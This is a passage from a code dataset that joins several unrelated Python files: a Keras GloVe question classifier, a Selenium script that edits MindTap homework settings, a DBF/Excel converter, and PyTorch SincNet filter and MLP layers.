LabelBinarizer, MultiLabelBinarizer\r\nimport keras\r\nimport tensorflow as tf\r\nfrom keras.layers import Layer\r\nfrom keras.preprocessing.text import Tokenizer\r\nfrom keras.preprocessing.sequence import pad_sequences\r\nfrom keras.layers import Dense, Input, Reshape, Concatenate, Flatten\r\nfrom keras.layers import Conv1D, GlobalMaxPooling1D, Embedding, Dropout, LSTM\r\nfrom keras.models import Model, load_model\r\nfrom keras import backend as K\r\nfrom keras.engine import Layer, InputSpec\r\nfrom keras import initializers, regularizers, constraints\r\nfrom keras.callbacks import Callback\r\nfrom keras.backend import manual_variable_initialization\r\nimport pickle\r\n\r\nclass SentenceClassifier:\r\n def __init__(self):\r\n self.MAX_SEQUENCE_LENGTH = 55\r\n self.EMBEDDING_DIM = 100\r\n self.LABEL_COUNT = 0\r\n self.WORD_INDEX = dict()\r\n self.LABEL_ENCODER = None\r\n\r\n def clean_str(self, string):\r\n \"\"\"\r\n Cleans each string and convert to lower case.\r\n \"\"\"\r\n string = re.sub(r\"\\'s\", \"\", string)\r\n string = re.sub(r\"\\'ve\", \"\", string)\r\n string = re.sub(r\"n\\'t\", \"n not\", string)\r\n string = re.sub(r\"\\'re\", \"\", string)\r\n string = re.sub(r\"\\'d\", \"\", string)\r\n string = re.sub(r\"\\'ll\", \"\", string)\r\n string = re.sub(r\"\\\\n\", \"\", string)\r\n string = re.sub(r\"[^A-Za-z0-9]\", \" \", string)\r\n string = re.sub(r\"\\s{2,}\", \" \", string)\r\n return string.strip().lower()\r\n\r\n def loader_encoder(self, table, type=\"json\"):\r\n \"\"\"\r\n Load and encode data from dataset.\r\n\r\n type = \"sql\" means get data from MySQL database.\r\n type = \"json\" means get data from .json file.\r\n \"\"\"\r\n\r\n # if type == \"sql\":\r\n # mydb, cursor = self.connect_to_db()\r\n #\r\n # cursor.execute(\"select question from \" + table) # load questions from db\r\n # questions = list(str(x[0]) for x in cursor.fetchall())\r\n #\r\n # cursor.execute(\"select tags from \" + table)\r\n # tags = list(re.split(',\\s*', tag[0]) for tag in cursor.fetchall())\r\n #\r\n # del (mydb)\r\n # del (cursor)\r\n\r\n if type == \"json\":\r\n with open('./data/' + table + '.json', 'r', encoding='utf8') as f:\r\n datastore = json.load(f)\r\n questions = []\r\n tags = []\r\n for row in datastore:\r\n questions.append(self.clean_str(row['question']))\r\n tags.append(row['tags'].split(','))\r\n\r\n if table.lower()=='trec' and os.path.exists('./saved/trec_tokenizer.pkl'):\r\n\r\n with open('./saved/trec_tokenizer.pkl', 'rb') as f:\r\n tokenizer = pickle.load(f)\r\n self.WORD_INDEX = tokenizer.word_index\r\n else:\r\n tokenizer = Tokenizer(lower=True, char_level=False)\r\n tokenizer.fit_on_texts(questions)\r\n self.WORD_INDEX = tokenizer.word_index\r\n\r\n questions_encoded = tokenizer.texts_to_sequences(questions)\r\n questions_encoded_padded = pad_sequences(questions_encoded, maxlen=self.MAX_SEQUENCE_LENGTH, padding='post')\r\n\r\n\r\n for i, ele in enumerate(tags):\r\n for j, tag in enumerate(ele):\r\n if len(tag) == 0 or tag == ',':\r\n del tags[i][j]\r\n\r\n if table.lower()=='trec' and os.path.exists('./saved/trec_label_encoder.pkl'):\r\n with open('./saved/trec_label_encoder.pkl', 'rb') as f:\r\n self.LABEL_ENCODER = pickle.load(f)\r\n self.LABEL_COUNT = 6\r\n encoder = self.LABEL_ENCODER\r\n tags_encoded = encoder.fit_transform(tags)\r\n else:\r\n encoder = MultiLabelBinarizer()\r\n encoder.fit(tags)\r\n self.LABEL_ENCODER = encoder\r\n tags_encoded = encoder.fit_transform(tags)\r\n self.LABEL_COUNT = len(tags_encoded[0]) # No. of labels\r\n print(\"\\tUnique Tokens in Training Data: \", len(self.WORD_INDEX))\r\n print(\"\\nNumber of labels: \", self.LABEL_COUNT)\r\n return questions_encoded_padded, tags_encoded\r\n\r\n def load_embeddings(self, EMBED_PATH='./embeddings/glove.6B.100d.txt'):\r\n \"\"\"\r\n Load pre-trained embeddings into memory.\r\n \"\"\"\r\n embeddings_index = {}\r\n try:\r\n \tf = open(EMBED_PATH, encoding='utf-8')\r\n except FileNotFoundError:\r\n \tprint(\"Embeddings missing.\")\r\n \tsys.exit()\r\n for line in f:\r\n values = line.rstrip().rsplit(' ')\r\n word = values[0]\r\n vec = np.asarray(values[1:], dtype='float32')\r\n embeddings_index[word] = vec\r\n f.close()\r\n print(\"\\tNumber of tokens in embeddings file: \", len(embeddings_index))\r\n return embeddings_index\r\n\r\n def create_embedding_matrix(self, embeddings_index):\r\n \"\"\"\r\n Creates an embedding matrix for all the words(vocab) in the training data with shape (vocab, EMBEDDING_DIM).\r\n Out-of-vocab words will be randomly initialized to values between +0.25 and -0.25.\r\n \"\"\"\r\n words_not_found = []\r\n vocab = len(self.WORD_INDEX) + 1\r\n embedding_matrix = np.random.uniform(-0.25, 0.25, size=(vocab, self.EMBEDDING_DIM))\r\n for word, i in self.WORD_INDEX.items():\r\n if i >= vocab:\r\n continue\r\n embedding_vector = embeddings_index.get(word)\r\n if (embedding_vector is not None) and len(embedding_vector) > 0:\r\n embedding_matrix[i] = embedding_vector\r\n else:\r\n words_not_found.append(word)\r\n\r\n print(\"\\tShape of embedding matrix: \", str(embedding_matrix.shape))\r\n print(\"\\tNo. of words not found in pre-trained embeddings: \", len(words_not_found))\r\n return embedding_matrix\r\n\r\n def sentence_classifier(self, embedding_matrix, x, y, table, load_saved=1):\r\n \"\"\"\r\n Makes uses of Keras functional API for constructing the model.\r\n\r\n If load_saved=1, THEN load old model, ELSE train new model\r\n \"\"\"\r\n\r\n model_name = table + \".model.h5\"\r\n if load_saved == 1 and os.path.exists('./saved/' + model_name):\r\n\r\n print(\"\\nLoading saved model:\" + model_name )\r\n model = load_model('./saved/' + model_name)\r\n print(\"Model Summary\")\r\n print(model.summary())\r\n\r\n else:\r\n print(\"\\nTraining model...\")\r\n inputs = Input(shape=(self.MAX_SEQUENCE_LENGTH,), dtype='int32')\r\n embedding = Embedding(input_dim=(len(self.WORD_INDEX) + 1), output_dim=self.EMBEDDING_DIM,\r\n weights=[embedding_matrix],\r\n input_length=self.MAX_SEQUENCE_LENGTH, trainable=False)(inputs)\r\n\r\n X = keras.layers.SpatialDropout1D(0.2)(embedding)\r\n\r\n\r\n output = Dense(units=self.LABEL_COUNT, activation='sigmoid')(X)\r\n\r\n model = Model(inputs=inputs, outputs=output, name='question_classifier')\r\n print(\"Model Summary\")\r\n print(model.summary())\r\n\r\n # cbk = OutputObserver(model, self, table)\r\n adam = keras.optimizers.Adam(lr=1e-5, decay=1e-6, epsilon=1e-7)\r\n\r\n model.compile(loss='binary_crossentropy', optimizer='adam', metrics=['accuracy'])\r\n model.fit(x, y,\r\n batch_size=200,\r\n epochs=800,\r\n verbose=2,\r\n callbacks=[]) # callbacks=[cbk] to test model on sample sentences at the end of every epoch.\r\n\r\n return model\r\n\r\n def tag_question(self, model, question, graph=None):\r\n question = self.clean_str(question)\r\n print(question)\r\n question_encoded = [[self.WORD_INDEX[w] for w in question.split(' ') if w in self.WORD_INDEX]]\r\n question_encoded_padded = pad_sequences(question_encoded, maxlen=self.MAX_SEQUENCE_LENGTH, padding='post')\r\n predictions = model.predict(question_encoded_padded)\r\n\r\n tags_list = list()\r\n possible_tags = dict()\r\n for i, probability in enumerate(predictions[0]):\r\n if probability >= 0.1:\r\n tags_list.append([self.LABEL_ENCODER.classes_[i], probability])\r\n\r\n tags_list.sort(key=lambda x: int(x[1]), reverse=True)\r\n tags_list = tags_list[:10]\r\n\r\n for ele in tags_list:\r\n possible_tags[ele[0].capitalize()] = str(ele[1])[:4]\r\n\r\n\r\n print(possible_tags)\r\n return possible_tags\r\n\r\n def setup_classifier(self, table=\"trec\", load_saved=1):\r\n keras.backend.clear_session()\r\n print(\"Loading Data Set...\")\r\n x, y = self.loader_encoder(table)\r\n\r\n embeddings_index = self.load_embeddings()\r\n\r\n print(\"\\nGenerating embedding matrix...\")\r\n embedding_matrix = self.create_embedding_matrix(embeddings_index)\r\n\r\n # Loading / Training model\r\n model = self.sentence_classifier(embedding_matrix, x, y, table, load_saved=load_saved)\r\n\r\n return model, embeddings_index\r\n\r\n # def connect_to_db(self):\r\n # mydb = mysql.connector.connect(host=\"localhost\", user=\"root\", passwd=\"root\", database=\"questiondb\")\r\n # cursor = mydb.cursor()\r\n # return mydb, cursor\r\n\r\n\r\nclass OutputObserver(Callback):\r\n \"\"\"\r\n Used to test model with sample sentences after every epoch, if [cbk] passed as arg to callbacks, in model.fit function.\r\n \"\"\"\r\n\r\n def __init__(self, model, classifier, table):\r\n self.model = model\r\n self.classifier = classifier\r\n self.table = table\r\n\r\n def on_epoch_end(self, epoch, logs={}):\r\n if self.table=='test':\r\n self.classifier.tag_question(self.model, \"Is this sensor ghosting, or something else?\")\r\n self.classifier.tag_question(self.model, \"The reason for my pale colored / bad contrast film images?\")\r\n self.classifier.tag_question(self.model, \"Cameras using mirrors instead of lenses to get coloured images?\")\r\n\r\n if self.table=='trec':\r\n self.classifier.tag_question(self.model, \"Who was the king of the Chinese ?\")\r\n self.classifier.tag_question(self.model, \"How much do fruit cost there in china ?\")\r\n self.classifier.tag_question(self.model, \"Who was the king of the Chinese ? How much do fruit cost in China ?\")\r\n self.classifier.tag_question(self.model, \"Who was the king of the Chinese and how much do fruits cost there in china ?\")\r\n self.classifier.tag_question(self.model, \"How To download images from Internet and what's the term for chinese fruits ?\")\r\n self.classifier.tag_question(self.model, \"Where is India located?\")\r\n\r\nif __name__ == '__main__':\r\n classifier = SentenceClassifier()\r\n model, embeddings_index = classifier.setup_classifier('trec') # Setup classifier with trec as default dataset.\r\n","sub_path":"Server/glove_classifier.py","file_name":"glove_classifier.py","file_ext":"py","file_size_in_byte":11010,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"278951573","text":"'''\r\nCreated on Aug 21, 2018\r\n\r\n@author: QDoan\r\n'''\r\nimport logging, os, time\r\nfrom selenium import webdriver\r\nfrom mtmf.pages.instructor_home_page import InstructorHomePage\r\nfrom mtmf.pages.instructor_dashboard import InstructorDashboard\r\nfrom mtmf.pages.assignment_editor_page import AssignmentEditor \r\nfrom mtmf.pages import login_page\r\nfrom myutils import utils_files_io\r\n\r\ndef set_homework_quantity():\r\n ''' Function to extract the amount number for homework exercise.\r\n This function works for quizzes too. ''' \r\n \r\n ''' Read list of assignments '''\r\n assignments_list = utils_files_io.read_list_from_file('data/assignments_list.txt')\r\n \r\n for assignment_name in assignments_list:\r\n ''' 1. Go to assignment via dropdown menu, and click on Edit Assignment '''\r\n msg = 'Go to assignment \"{}\" to edit...'.format(assignment_name)\r\n print(msg)\r\n logging.info(' ' + msg)\r\n dashboard = InstructorDashboard(driver)\r\n dashboard.select_assignment_from_dropdown(assignment_name)\r\n dashboard.click_edit_assignment(); time.sleep(1)\r\n \r\n editor = AssignmentEditor(driver)\r\n \r\n ''' 2. Get number of LO's '''\r\n learning_objectives = editor.get_learning_objectives()\r\n print('There are {} LOs'.format(len(learning_objectives)))\r\n \r\n for lo_number in range(1, len(learning_objectives) + 1):\r\n ''' 2a. Click to expand Exercise '''\r\n lo_name = editor.get_lo_name(lo_number)\r\n print(lo_name)\r\n editor.click_on_lo(lo_number); time.sleep(1)\r\n \r\n # Click on Exercise Set to display detail\r\n editor.click_on_exercise_set(); time.sleep(3)\r\n \r\n # Extract number of exercises\r\n exercises = editor.get_number_of_exercises(); time.sleep(1)\r\n print('There are {} exercises'.format(len(exercises)))\r\n \r\n ''' 2b. Set homework amount to 1 '''\r\n need_saving = False\r\n for exercise_number in range(1, len(exercises) + 1):\r\n amount = editor.extract_exercise_amount(exercise_number)\r\n if amount == \"0\":\r\n need_saving = True\r\n msg = 'Amount: {}. Set it to 1.'.format(amount)\r\n print(msg)\r\n logging.info(' ' + msg)\r\n editor.set_exercise_amount_to_one(exercise_number)\r\n \r\n if need_saving:\r\n editor.click_save_changes()\r\n else:\r\n # Click on Learning Objective again to hide its detail\r\n editor.click_on_lo(lo_number)\r\n \r\n msg = 'Closing assignment editor page'\r\n print(msg)\r\n logging.info(' ' + msg)\r\n time.sleep(1)\r\n driver.refresh()\r\n \r\n\r\nif __name__ == '__main__':\r\n logfile = 'C:/Workspace/Sandbox/log.txt'\r\n if os.path.isfile(logfile): os.remove(logfile)\r\n logging.basicConfig(filename=logfile, level=logging.INFO)\r\n \r\n driver = webdriver.Chrome('C:/Workspace/Tools/drivers/chromedriver.exe')\r\n driver.set_window_size(1650, 1080)\r\n \r\n ''' Login into Mindtap Math Foundation '''\r\n msg = 'Logging into MTMF...'\r\n print(msg)\r\n logging.info(' ' + msg)\r\n login_page.login_mindtap_prod(driver)\r\n \r\n ''' Launch course '''\r\n msg = 'Launching course \"[CLONE] CustomCourse_Master_7-20-2018\" ...'\r\n print(msg)\r\n logging.info(' ' + msg)\r\n home_page = InstructorHomePage(driver)\r\n home_page.launch_course('DEPNSXBPTPG5'); time.sleep(3)\r\n \r\n ''' Extract homework quantity setting '''\r\n set_homework_quantity()\r\n ","sub_path":"DevMathPython/mtmf/course_editor/set_homework_quantity.py","file_name":"set_homework_quantity.py","file_ext":"py","file_size_in_byte":3698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"474462063","text":"from __future__ import print_function\n\nimport sys\n\n\"\"\"\n===========================\nDBF and DF file reader\n===========================\nFile history and credits:\nC. Miller script development 10.08.14\nJ. A. Fonseca adaptation for CEA tool 25.05.16\n\n\"\"\"\n\nimport pysal\nimport numpy as np\nimport pandas as pd\nimport os\n\n\ndef dataframe_to_dbf(df, dbf_path, specs=None):\n if specs is None:\n type2spec = {int: ('N', 20, 0),\n np.int64: ('N', 20, 0),\n float: ('N', 36, 15),\n np.float64: ('N', 36, 15),\n unicode: ('C', 25, 0),\n str: ('C', 25, 0)\n }\n types = [type(df[i].iloc[0]) for i in df.columns]\n specs = [type2spec[t] for t in types]\n dbf = pysal.open(dbf_path, 'w', 'dbf')\n dbf.header = list(df.columns)\n dbf.field_spec = specs\n df_transpose = df.T\n length = len(df_transpose.columns)\n for row in range(length):\n dbf.write(df_transpose[row])\n dbf.close()\n return dbf_path\n\n\ndef dbf_to_dataframe(dbf_path, index=None, cols=False, include_index=False):\n db = pysal.open(dbf_path)\n if cols:\n if include_index:\n cols.append(index)\n vars_to_read = cols\n else:\n vars_to_read = db.header\n data = dict([(var, db.by_col(var)) for var in vars_to_read])\n if index:\n index = db.by_col(index)\n db.close()\n return pd.DataFrame(data, index=index)\n else:\n db.close()\n return pd.DataFrame(data)\n\n\ndef xls_to_dbf(input_path, output_path):\n if not input_path.endswith('.xls'):\n raise ValueError('Excel input file should have *.xls extension')\n\n if not os.path.exists(input_path):\n raise ValueError('Excel input file does not exist')\n\n if not output_path.endswith('.dbf'):\n raise ValueError('DBF output file should have *.dbf extension')\n\n df = pd.read_excel(input_path)\n dataframe_to_dbf(df, output_path)\n\n\ndef dbf_to_xls(input_path, output_path):\n if not input_path.endswith('.dbf'): # check if the extension of the input is dbf\n raise ValueError('DBF input file should have *.dbf extension')\n\n if not os.path.exists(input_path):\n raise ValueError('DBF input file does not exist')\n\n if not output_path.endswith('.xls'): # check if the extension of the input is xls\n raise ValueError('Excel output file should have *.xls extension')\n\n df = dbf_to_dataframe(input_path)\n df.to_excel(output_path)\n\n\ndef run_as_script(input_path, output_path):\n if input_path.endswith('.dbf'):\n dbf_to_xls(input_path=input_path, output_path=output_path)\n elif input_path.endswith('.xls'):\n xls_to_dbf(input_path=input_path, output_path=output_path)\n else:\n print('input file type not supported')\n\n\nif __name__ == '__main__':\n import argparse\n\n parser = argparse.ArgumentParser()\n parser.add_argument('--input-path')\n parser.add_argument('--output-path')\n args = parser.parse_args()\n run_as_script(input_path=args.input_path, output_path=args.output_path)\n","sub_path":"cea/utilities/dbfreader.py","file_name":"dbfreader.py","file_ext":"py","file_size_in_byte":3111,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"95404009","text":"import numpy as np\nimport torch\nimport torch.nn.functional as F\nimport torch.nn as nn\nimport sys\nfrom torch.autograd import Variable\nimport math\n\ndef flip(x, dim):\n\txsize = x.size()\n\tdim = x.dim() + dim if dim < 0 else dim\n\tx = x.contiguous()\n\tx = x.view(-1, *xsize[dim:])\n\tx = x.view(x.size(0), x.size(1), -1)[:, getattr(torch.arange(x.size(1)-1, \n\t\t\t\t\t\t\t\t\t\t-1, -1), ('cpu','cuda')[x.is_cuda])().long(), :]\n\treturn x.view(xsize)\n\n\ndef sinc(band,t_right):\n\ty_right= torch.sin(2*math.pi*band*t_right)/(2*math.pi*band*t_right)\n\ty_left= flip(y_right,0)\n\n\ty=torch.cat([y_left,Variable(torch.ones(1)).cuda(),y_right])\n\n\treturn y\n\t\t\n\nclass SincConv_fast(nn.Module):\n\t\"\"\"Sinc-based convolution\n\tParameters\n\t----------\n\tin_channels : `int`\n\t\t\tNumber of input channels. Must be 1.\n\tout_channels : `int`\n\t\t\tNumber of filters.\n\tkernel_size : `int`\n\t\t\tFilter length.\n\tsample_rate : `int`, optional\n\t\t\tSample rate. Defaults to 16000.\n\tUsage\n\t-----\n\tSee `torch.nn.Conv1d`\n\tReference\n\t---------\n\tMirco Ravanelli, Yoshua Bengio,\n\t\"Speaker Recognition from raw waveform with SincNet\".\n\thttps://arxiv.org/abs/1808.00158\n\t\"\"\"\n\n\t@staticmethod\n\tdef to_mel(hz):\n\t\treturn 2595 * np.log10(1 + hz / 700)\n\n\t@staticmethod\n\tdef to_hz(mel):\n\t\treturn 700 * (10 ** (mel / 2595) - 1)\n\n\tdef __init__(self, out_channels, kernel_size, sample_rate, in_channels=1,\n\t\t\t\t\t\t\t stride=1, padding=0, dilation=1, bias=False, groups=1, min_low_hz=50, min_band_hz=50):\n\n\t\tsuper(SincConv_fast,self).__init__()\n\n\t\tif in_channels != 1:\n\t\t\t#msg = (f'SincConv only support one input channel '\n\t\t\t# f'(here, in_channels = {in_channels:d}).')\n\t\t\tmsg = \"SincConv only support one input channel (here, in_channels = {%i})\" % (in_channels)\n\t\t\traise ValueError(msg)\n\n\t\tself.out_channels = out_channels\n\t\tself.kernel_size = kernel_size\n\t\t\n\t\t# Forcing the filters to be odd (i.e, perfectly symmetrics)\n\t\tif kernel_size%2==0:\n\t\t\tself.kernel_size=self.kernel_size+1\n\t\t\t\t\n\t\tself.stride = stride\n\t\tself.padding = padding\n\t\tself.dilation = dilation\n\n\t\tif bias:\n\t\t\traise ValueError('SincConv does not support bias.')\n\t\tif groups > 1:\n\t\t\traise ValueError('SincConv does not support groups.')\n\n\t\tself.sample_rate = sample_rate\n\t\tself.min_low_hz = min_low_hz\n\t\tself.min_band_hz = min_band_hz\n\n\t\t# initialize filterbanks such that they are equally spaced in Mel scale\n\t\tlow_hz = 30\n\t\thigh_hz = self.sample_rate / 2 - (self.min_low_hz + self.min_band_hz)\n\n\t\tmel = np.linspace(self.to_mel(low_hz),\n\t\t\t\t\t\t\t\t\t\t\tself.to_mel(high_hz),\n\t\t\t\t\t\t\t\t\t\t\tself.out_channels + 1)\n\t\thz = self.to_hz(mel)\n\t\t\n\n\t\t# filter lower frequency (out_channels, 1)\n\t\tself.low_hz_ = nn.Parameter(torch.Tensor(hz[:-1]).view(-1, 1))\n\n\t\t# filter frequency band (out_channels, 1)\n\t\tself.band_hz_ = nn.Parameter(torch.Tensor(np.diff(hz)).view(-1, 1))\n\n\t\t# Hamming window\n\t\t#self.window_ = torch.hamming_window(self.kernel_size)\n\t\tn_lin=torch.linspace(0, (self.kernel_size/2)-1, steps=int((self.kernel_size/2))) # computing only half of the window\n\t\tself.window_=0.54-0.46*torch.cos(2*math.pi*n_lin/self.kernel_size);\n\n\n\t\t# (kernel_size, 1)\n\t\tn = (self.kernel_size - 1) / 2.0\n\t\tself.n_ = 2*math.pi*torch.arange(-n, 0).view(1, -1) / self.sample_rate # Due to symmetry, I only need half of the time axes\n\n\n\n\n\tdef forward(self, waveforms):\n\t\t\"\"\"\n\t\tParameters\n\t\t----------\n\t\twaveforms : `torch.Tensor` (batch_size, 1, n_samples)\n\t\t\t\tBatch of waveforms.\n\t\tReturns\n\t\t-------\n\t\tfeatures : `torch.Tensor` (batch_size, out_channels, n_samples_out)\n\t\t\t\tBatch of sinc filters activations.\n\t\t\"\"\"\n\n\t\tself.n_ = self.n_.to(waveforms.device)\n\n\t\tself.window_ = self.window_.to(waveforms.device)\n\n\t\tlow = self.min_low_hz + torch.abs(self.low_hz_)\n\t\t\n\t\thigh = torch.clamp(low + self.min_band_hz + torch.abs(self.band_hz_),self.min_low_hz,self.sample_rate/2)\n\t\tband=(high-low)[:,0]\n\t\t\n\t\tf_times_t_low = torch.matmul(low, self.n_)\n\t\tf_times_t_high = torch.matmul(high, self.n_)\n\n\t\tband_pass_left=((torch.sin(f_times_t_high)-torch.sin(f_times_t_low))/(self.n_/2))*self.window_ # Equivalent of Eq.4 of the reference paper (SPEAKER RECOGNITION FROM RAW WAVEFORM WITH SINCNET). I just have expanded the sinc and simplified the terms. This way I avoid several useless computations. \n\t\tband_pass_center = 2*band.view(-1,1)\n\t\tband_pass_right= torch.flip(band_pass_left,dims=[1])\n\t\t\n\t\t\n\t\tband_pass=torch.cat([band_pass_left,band_pass_center,band_pass_right],dim=1)\n\n\t\t\n\t\tband_pass = band_pass / (2*band[:,None])\n\t\t\n\n\t\tself.filters = (band_pass).view(\n\t\t\t\tself.out_channels, 1, self.kernel_size)\n\n\t\treturn F.conv1d(waveforms, self.filters, stride=self.stride,\n\t\t\t\t\t\t\t\t\t\tpadding=self.padding, dilation=self.dilation,\n\t\t\t\t\t\t\t\t\t\t bias=None, groups=1) \n\n\n\t\t\t\t\n\t\t\t\t\nclass sinc_conv(nn.Module):\n\n\tdef __init__(self, N_filt,Filt_dim,fs):\n\t\tsuper(sinc_conv,self).__init__()\n\n\t\t# Mel Initialization of the filterbanks\n\t\tlow_freq_mel = 80\n\t\thigh_freq_mel = (2595 * np.log10(1 + (fs / 2) / 700)) # Convert Hz to Mel\n\t\tmel_points = np.linspace(low_freq_mel, high_freq_mel, N_filt) # Equally spaced in Mel scale\n\t\tf_cos = (700 * (10**(mel_points / 2595) - 1)) # Convert Mel to Hz\n\t\tb1=np.roll(f_cos,1)\n\t\tb2=np.roll(f_cos,-1)\n\t\tb1[0]=30\n\t\tb2[-1]=(fs/2)-100\n\t\t\t\t\t\t\n\t\tself.freq_scale=fs*1.0\n\t\tself.filt_b1 = nn.Parameter(torch.from_numpy(b1/self.freq_scale))\n\t\tself.filt_band = nn.Parameter(torch.from_numpy((b2-b1)/self.freq_scale))\n\n\t\t\n\t\tself.N_filt=N_filt\n\t\tself.Filt_dim=Filt_dim\n\t\tself.fs=fs\n\t\t\t\t\n\n\tdef forward(self, x):\n\t\t\t\n\t\tfilters=Variable(torch.zeros((self.N_filt,self.Filt_dim))).cuda()\n\t\tN=self.Filt_dim\n\t\tt_right=Variable(torch.linspace(1, (N-1)/2, steps=int((N-1)/2))/self.fs).cuda()\n\t\t\n\t\t\n\t\tmin_freq=50.0;\n\t\tmin_band=50.0;\n\t\t\n\t\tfilt_beg_freq=torch.abs(self.filt_b1)+min_freq/self.freq_scale\n\t\tfilt_end_freq=filt_beg_freq+(torch.abs(self.filt_band)+min_band/self.freq_scale)\n\t \n\t\tn=torch.linspace(0, N, steps=N)\n\n\t\t# Filter window (hamming)\n\t\twindow=0.54-0.46*torch.cos(2*math.pi*n/N);\n\t\twindow=Variable(window.float().cuda())\n\n\t\t\n\t\tfor i in range(self.N_filt):\n\t\t\t\t\t\t\t\t\t\t\n\t\t\t\tlow_pass1 = 2*filt_beg_freq[i].float()*sinc(filt_beg_freq[i].float()*self.freq_scale,t_right)\n\t\t\t\tlow_pass2 = 2*filt_end_freq[i].float()*sinc(filt_end_freq[i].float()*self.freq_scale,t_right)\n\t\t\t\tband_pass=(low_pass2-low_pass1)\n\n\t\t\t\tband_pass=band_pass/torch.max(band_pass)\n\n\t\t\t\tfilters[i,:]=band_pass.cuda()*window\n\n\t\tout=F.conv1d(x, filters.view(self.N_filt,1,self.Filt_dim))\n\n\t\treturn out\n\t\t\n\ndef act_fun(act_type):\n\tif act_type==\"softplus\":\n\t\treturn nn.Softplus()\n\n\tif act_type==\"relu\":\n\t\treturn nn.ReLU()\n\t\t\t\t\t\t\n\tif act_type==\"tanh\":\n\t\treturn nn.Tanh()\n\t\t\t\t\t\t\n\tif act_type==\"sigmoid\":\n\t\treturn nn.Sigmoid()\n\t\t\t\t\t \n\tif act_type==\"leaky_relu\":\n\t\treturn nn.LeakyReLU(0.2)\n\t\t\t\t\t\t\n\tif act_type==\"elu\":\n\t\treturn nn.ELU()\n\t\t\t\t\t\t\t\t\t\t \n\tif act_type==\"softmax\":\n\t\treturn nn.LogSoftmax(dim=1)\n\t\t\t\t\n\tif act_type==\"linear\":\n\t\treturn nn.LeakyReLU(1) # initializzed like this, but not used in forward!\n\t\t\t\t\t\t\n\t\t\t\t\t\t\nclass LayerNorm(nn.Module):\n\tdef __init__(self, features, eps=1e-6):\n\t\tsuper(LayerNorm,self).__init__()\n\t\tself.gamma = nn.Parameter(torch.ones(features))\n\t\tself.beta = nn.Parameter(torch.zeros(features))\n\t\tself.eps = eps\n\n\tdef forward(self, x):\n\t\tmean = x.mean(-1, keepdim=True)\n\t\tstd = x.std(-1, keepdim=True)\n\t\treturn self.gamma * (x - mean) / (std + self.eps) + self.beta\n\n\nclass MLP(nn.Module):\n\tdef __init__(self, options):\n\t\tsuper(MLP, self).__init__()\n\t\t\n\t\tself.input_dim=int(options['input_dim'])\n\t\tself.fc_lay=options['fc_lay']\n\t\tself.fc_drop=options['fc_drop']\n\t\tself.fc_use_batchnorm=options['fc_use_batchnorm']\n\t\tself.fc_use_laynorm=options['fc_use_laynorm']\n\t\tself.fc_use_laynorm_inp=options['fc_use_laynorm_inp']\n\t\tself.fc_use_batchnorm_inp=options['fc_use_batchnorm_inp']\n\t\tself.fc_act=options['fc_act']\n\t\t\n\t \n\t\tself.wx = nn.ModuleList([])\n\t\tself.bn = nn.ModuleList([])\n\t\tself.ln = nn.ModuleList([])\n\t\tself.act = nn.ModuleList([])\n\t\tself.drop = nn.ModuleList([])\n\t \n\n\t \n\t\t# input layer normalization\n\t\tif self.fc_use_laynorm_inp:\n\t\t\tself.ln0=LayerNorm(self.input_dim)\n\t\t\t\n\t\t# input batch normalization \n\t\tif self.fc_use_batchnorm_inp:\n\t\t\tself.bn0=nn.BatchNorm1d([self.input_dim],momentum=0.05)\n\t\t\t \n\t\t\t \n\t\tself.N_fc_lay=len(self.fc_lay)\n\t\t\t\t \n\t\tcurrent_input=self.input_dim\n\t\t\n\t\t# Initialization of hidden layers\n\t\t\n\t\tfor i in range(self.N_fc_lay):\n\t\t\t# dropout\n\t\t\tself.drop.append(nn.Dropout(p=self.fc_drop[i]))\n\t\t\n\t\t\t# activation\n\t\t\tself.act.append(act_fun(self.fc_act[i]))\n\t\t\t \n\t\t\t \n\t\t\tadd_bias=True\n\t\t\t \n\t\t\t# layer norm initialization\n\t\t\tself.ln.append(LayerNorm(self.fc_lay[i]))\n\t\t\tself.bn.append(nn.BatchNorm1d(self.fc_lay[i],momentum=0.05))\n\t\t\t \n\t\t\tif self.fc_use_laynorm[i] or self.fc_use_batchnorm[i]:\n\t\t\t\tadd_bias=False\n\t\t\t \n\t\t\t\t\t\t\n\t\t\t# Linear operations\n\t\t\tself.wx.append(nn.Linear(current_input, self.fc_lay[i],bias=add_bias))\n\t\t\t \n\t\t\t# weight initialization\n\t\t\tself.wx[i].weight = torch.nn.Parameter(torch.Tensor(self.fc_lay[i],current_input).uniform_(-np.sqrt(0.01/(current_input+self.fc_lay[i])),np.sqrt(0.01/(current_input+self.fc_lay[i]))))\n\t\t\tself.wx[i].bias = torch.nn.Parameter(torch.zeros(self.fc_lay[i]))\n\t\t\t \n\t\t\tcurrent_input=self.fc_lay[i]\n\t\t\t \n\t\t\t \n\tdef forward(self, x):\n\n\t\t\t\n\t\t# Applying Layer/Batch Norm\n\t\tif bool(self.fc_use_laynorm_inp):\n\t\t\tx=self.ln0((x))\n\t\t\t\n\t\tif bool(self.fc_use_batchnorm_inp):\n\t\t\tx=self.bn0((x))\n\t\t\t\n\t\tfor i in range(self.N_fc_lay):\n\n\t\t\tif self.fc_act[i]!='linear':\n\t\t\t\t\t\n\t\t\t\tif self.fc_use_laynorm[i]:\n\t\t\t\t\tx = self.drop[i](self.act[i](self.ln[i](self.wx[i](x))))\n\t\t\t\t\n\t\t\t\tif self.fc_use_batchnorm[i]:\n\t\t\t\t\tx = self.drop[i](self.act[i](self.bn[i](self.wx[i](x))))\n\t\t\t\t\n\t\t\t\tif self.fc_use_batchnorm[i]==False and self.fc_use_laynorm[i]==False:\n\t\t\t\t\tx = self.drop[i](self.act[i](self.wx[i](x)))\n\t\t\t\t \n\t\t\telse:\n\t\t\t\tif self.fc_use_laynorm[i]:\n\t\t\t\t\tx = self.drop[i](self.ln[i](self.wx[i](x)))\n\t\t\t\t\n\t\t\t\tif self.fc_use_batchnorm[i]:\n\t\t\t\t\tx = self.drop[i](self.bn[i](self.wx[i](x)))\n\t\t\t\t\n\t\t\t\tif self.fc_use_batchnorm[i]==False and self.fc_use_laynorm[i]==False:\n\t\t\t\t\tx = self.drop[i](self.wx[i](x)) \n\t\t\t\t\n\t\treturn x\n\n\nclass MLP_for_me(nn.Module):\n\tdef __init__(self, options):\n\t\tsuper(MLP_for_me, 